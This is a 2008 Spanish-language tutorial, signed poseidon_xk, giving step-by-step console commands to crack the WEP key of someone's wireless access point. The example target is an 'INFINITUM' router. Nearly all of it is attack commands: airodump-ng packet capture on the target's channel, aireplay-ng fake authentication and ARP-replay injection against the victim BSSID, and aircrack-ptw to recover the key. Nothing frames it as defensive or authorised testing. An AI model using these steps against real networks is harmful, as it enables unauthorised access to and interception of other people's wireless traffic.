Abrimos una consola

ejecutamos el siguiente codigo

codigo:
airodump-ng rtap0

ejecutamos el siguiente codigo

codigo:
cd /sys/class/net/wifi0/device

modificamos el bssid
codigo:
mousepad bssid (es la mac address del access point, en el archivo que se abrio solo le das ctrl + s, esto es para guardar los cambios,
NO CIERRES EL ARCHIVO PORQUE HAY ERRORES)

En otra consola modificamos el canal

codigo:
mousepad channel (solo lo cambias por el numero que te da el airodump-ng rtap0)

Modificamos el rate
codigo:
mousepad rate (en vez del 108 pones el 2)

Ahora vamos a preparar los tres codigos principales

Escribimos en la consola
codigo No. 1:
airodump-ng -c 1 -w nombrearchivoIVS rtap0 (-c es el canal del acces point
-w es el nombre donde se va a guardar la llave, no se te pase poner "IVS", sin espacios, sin
las comillas y con mayusculas)
en otra consola escribimos lo siguiente
Codigo No. 2:
aireplay-ng -1 0 -a BSSID -h MAC_WIFI0 -e ESSID wifi0 (BSSID = mac address del acces point
MAC_WIFI0 = Mac Adrress de la Laptop => 00:13:02:XX:XX:XX
ESSID = Nombre del acces point "INFINITUMXXXX")

En otro consola escribimos lo siguiente:

Codigo No. 3:
aireplay-ng -3 -b BSSID -h MAC_WIFI0 wifi0 (BSSID = Mac Address del Access Point
MAC_WIFI0 = Mac Address de la laptop = 00:13:02:XX:XX:XX)

En otra consola escribimos y "***EJECUTAMOS***"

codigo:
ifconfig wifi0 up

Depues de haber levantando la tarjeta ya ejecutas en codigo NO. 1, 2 y 3, ahora solo nos resta esperar a que llegue a 10000 o mas ARP's para
ejecutar el ultimo codigo

codigo:
aircrack-ptw nopmbrearchivoIVS.cap (este es el que nos da la clave del Access Point)

Autor: poseidon_xk 12/09/2008

El software es como el sexo, es mejor si es libre y seguro